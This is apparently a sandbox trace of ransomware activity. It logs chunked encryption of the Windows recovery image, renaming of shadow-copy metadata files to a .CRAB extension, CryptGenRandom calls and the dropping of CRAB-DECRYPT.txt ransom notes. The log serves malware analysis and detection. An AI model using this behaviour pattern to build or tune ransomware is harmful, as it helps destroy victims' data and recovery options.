File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 393234 True 1
Fn
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 393248 True 1
Fn
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 256 True 2
Fn
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 2384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1080 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 1088 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB True 1
Fn
